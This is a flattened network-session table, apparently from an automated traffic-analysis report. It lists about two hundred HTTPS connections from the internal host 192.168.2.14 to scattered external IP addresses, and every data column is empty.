                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22012192.168.2.1442306222.110.163.237443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22013192.168.2.144631053.124.20.171443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22014192.168.2.1440672111.26.44.87443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22015192.168.2.144923671.128.171.71443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22016192.168.2.143689669.162.34.73443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22017192.168.2.144997239.211.160.74443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22018192.168.2.1442670125.11.156.118443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22019192.168.2.145396213.202.47.148443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22020192.168.2.143522871.30.36.84443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22021192.168.2.1451478213.150.44.153443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22022192.168.2.1452386147.187.126.165443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22023192.168.2.1455818158.189.214.186443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22024192.168.2.1434992189.165.105.116443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22025192.168.2.146083824.204.165.254443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22026192.168.2.146031240.143.205.205443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22027192.168.2.145486681.70.171.131443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22028192.168.2.145699499.230.105.59443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22029192.168.2.1441678163.163.226.49443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22030192.168.2.1436796133.145.130.234443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22031192.168.2.1439850154.180.64.133443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22032192.168.2.143399435.150.154.67443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22033192.168.2.1450218177.191.41.157443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22034192.168.2.1434834153.149.166.10443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22035192.168.2.145186631.168.188.89443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22036192.168.2.14575601.64.91.144443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22037192.168.2.144567694.106.198.157443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22038192.168.2.1438162205.116.178.226443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22039192.168.2.145002427.64.10.126443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22040192.168.2.1446780116.139.119.88443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22041192.168.2.14487822.238.116.0443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22042192.168.2.145636070.9.9.194443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22043192.168.2.144020663.49.238.182443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22044192.168.2.145740824.80.143.9443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22045192.168.2.1454262200.64.202.72443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22046192.168.2.1435332166.127.196.61443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22047192.168.2.1433418143.189.232.170443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22048192.168.2.1433746205.234.7.104443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22049192.168.2.1433778200.64.171.196443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22050192.168.2.1448660178.163.19.80443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22051192.168.2.1455942173.184.104.225443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22052192.168.2.144532495.26.200.50443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22053192.168.2.1455338221.185.80.221443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22054192.168.2.144365070.212.249.176443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22055192.168.2.1454510103.54.26.133443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22056192.168.2.145387277.68.88.49443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22057192.168.2.1437072101.236.38.235443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22058192.168.2.1449500108.214.223.129443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22059192.168.2.144074836.69.129.107443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22060192.168.2.1442518107.164.159.56443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22061192.168.2.1437518123.41.191.145443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22062192.168.2.1433054147.160.105.217443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22063192.168.2.1437282157.187.175.115443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22064192.168.2.145085423.150.205.5443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22065192.168.2.144789481.45.241.216443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22066192.168.2.1452592185.48.28.217443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22067192.168.2.143911682.95.84.9443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22068192.168.2.145848480.69.26.205443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22069192.168.2.1458106125.190.51.6443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22070192.168.2.1449010120.226.43.236443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22071192.168.2.1432864206.83.134.6443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22072192.168.2.144540034.59.188.254443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22073192.168.2.1447734219.68.227.171443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22074192.168.2.144955447.242.72.65443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22075192.168.2.1444286211.76.124.140443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22076192.168.2.144589450.216.104.113443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22077192.168.2.145216093.25.105.141443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22078192.168.2.1438128112.28.0.75443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22079192.168.2.1449188107.76.9.189443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22080192.168.2.145418684.18.32.125443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22081192.168.2.143757627.16.216.82443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22082192.168.2.1458088190.178.152.185443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22083192.168.2.1442558188.204.92.138443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22084192.168.2.145229240.29.129.18443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22085192.168.2.1457080164.50.53.130443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22086192.168.2.1433558134.25.209.246443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22087192.168.2.143384076.57.241.197443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22088192.168.2.1447824165.137.124.41443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22089192.168.2.145161631.227.7.162443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22090192.168.2.1434368212.10.185.65443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22091192.168.2.1449992113.101.109.51443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22092192.168.2.1437968205.203.228.104443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22093192.168.2.143302451.121.254.59443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22094192.168.2.1438804106.0.239.214443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22095192.168.2.1441832218.175.54.224443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22096192.168.2.144842467.31.99.204443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22097192.168.2.144977689.179.188.144443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22098192.168.2.1453218155.248.69.122443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22099192.168.2.1452956165.42.173.213443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22100192.168.2.1447626196.224.233.110443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22101192.168.2.1454012152.173.113.43443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22102192.168.2.144832018.22.222.44443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22103192.168.2.1441528164.243.142.7443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22104192.168.2.1459082102.72.28.12443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22105192.168.2.1448532105.13.212.232443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22106192.168.2.1457598111.61.49.202443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22107192.168.2.1439472204.250.65.195443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22108192.168.2.1449442150.252.106.126443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22109192.168.2.144867020.231.238.95443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22110192.168.2.1450872132.169.200.98443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22111192.168.2.1457892184.178.215.127443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22112192.168.2.143821267.189.210.114443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22113192.168.2.144244020.221.115.54443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22114192.168.2.143825283.184.31.117443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22115192.168.2.145517082.253.95.204443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22116192.168.2.145758053.146.189.181443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22117192.168.2.1442304163.55.157.103443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22118192.168.2.143795688.78.107.157443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22119192.168.2.143576293.75.130.105443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22120192.168.2.1436314184.177.183.163443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22121192.168.2.1460646202.221.4.55443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22122192.168.2.1452570201.67.229.146443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22123192.168.2.1457618122.214.74.141443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22124192.168.2.144892491.15.157.129443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22125192.168.2.144722212.205.150.48443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22126192.168.2.1451338206.219.181.232443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22127192.168.2.1448020192.118.249.173443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22128192.168.2.1435554118.14.170.96443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22129192.168.2.143732459.47.23.150443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22130192.168.2.143866063.37.124.128443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22131192.168.2.1459638208.134.64.220443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22132192.168.2.146024472.144.254.150443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22133192.168.2.1442610183.65.242.172443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22134192.168.2.143964469.40.46.181443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22135192.168.2.144112289.218.41.108443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22136192.168.2.144917814.208.99.118443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22137192.168.2.1460190211.238.241.174443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22138192.168.2.1451648100.47.102.162443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22139192.168.2.144925892.135.195.18443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22140192.168.2.1448660218.227.139.234443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22141192.168.2.145056438.139.226.4443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22142192.168.2.143306642.231.150.127443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22143192.168.2.1441104185.75.34.26443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22144192.168.2.143598825.56.189.102443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22145192.168.2.14384602.66.173.4443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22146192.168.2.1457910178.57.240.136443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22147192.168.2.145384263.118.10.73443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22148192.168.2.145300449.10.250.7443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22149192.168.2.1455068165.125.186.73443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22150192.168.2.143461217.103.114.26443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22151192.168.2.144942472.55.136.231443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22152192.168.2.145454883.16.190.119443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22153192.168.2.143507090.40.220.196443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22154192.168.2.145589697.238.246.199443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22155192.168.2.1445638119.115.100.207443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22156192.168.2.145540891.188.189.67443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22157192.168.2.1453100133.251.6.143443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22158192.168.2.144632699.141.147.34443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22159192.168.2.144784836.23.198.97443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22160192.168.2.145272448.214.168.206443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22161192.168.2.1458888163.214.9.173443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22162192.168.2.1442554176.8.102.50443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22163192.168.2.1456206170.215.110.187443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22164192.168.2.144593658.109.187.148443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22165192.168.2.14517724.71.205.170443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22166192.168.2.145527880.193.43.15443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22167192.168.2.146054242.173.131.170443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22168192.168.2.1446524109.128.189.54443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22169192.168.2.145409819.32.5.242443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22170192.168.2.1460986196.42.105.158443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22171192.168.2.145587234.40.205.115443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22172192.168.2.1457692197.113.64.44443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22173192.168.2.145990096.17.70.153443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22174192.168.2.1439672193.224.182.36443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22175192.168.2.144296259.170.121.134443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22176192.168.2.1435122138.34.27.248443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22177192.168.2.1437610139.150.20.89443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22178192.168.2.143651474.102.103.21443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22179192.168.2.143853235.36.183.79443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22180192.168.2.1441976183.196.214.208443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22181192.168.2.1455872116.121.58.0443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22182192.168.2.1459798177.77.2.104443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22183192.168.2.1454490202.20.192.139443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22184192.168.2.1457830213.110.192.254443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22185192.168.2.1443226181.55.125.148443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22186192.168.2.145050080.210.34.76443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22187192.168.2.145628237.61.142.88443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22188192.168.2.1456656192.209.53.19443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22189192.168.2.145480075.78.136.4443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22190192.168.2.1460450176.124.106.49443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22191192.168.2.1433938115.217.88.36443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22192192.168.2.143464072.186.135.5443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22193192.168.2.1440040101.213.96.59443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22194192.168.2.1458308139.235.64.222443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22195192.168.2.145145634.124.76.12443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22196192.168.2.144474671.7.160.149443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22197192.168.2.1433498124.252.116.114443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22198192.168.2.144251435.162.89.97443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22199192.168.2.14445822.96.205.172443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22200192.168.2.1451458118.159.247.13443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22201192.168.2.1440414198.24.102.106443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22202192.168.2.1437014202.164.51.111443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22203192.168.2.145984259.181.73.251443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22204192.168.2.1445998198.137.58.229443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22205192.168.2.145161232.129.127.216443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22206192.168.2.143357036.66.18.106443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22207192.168.2.1433854133.79.166.137443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22208192.168.2.144572224.190.107.44443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22209192.168.2.1451520124.225.109.105443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22210192.168.2.144418288.152.134.171443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22211192.168.2.1444044156.22.4.167443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22212192.168.2.143661293.111.86.175443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22213192.168.2.1456820182.194.11.85443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22214192.168.2.1457674138.137.71.175443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22215192.168.2.143550075.71.188.99443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22216192.168.2.1456068108.12.148.178443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22217192.168.2.1440164213.251.11.13443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22218192.168.2.1447112216.232.118.86443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22219192.168.2.1459666182.228.221.116443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22220192.168.2.1454544142.192.27.222443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22221192.168.2.1460100120.147.30.151443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22222192.168.2.145435044.54.183.216443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22223192.168.2.1437858116.165.214.78443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
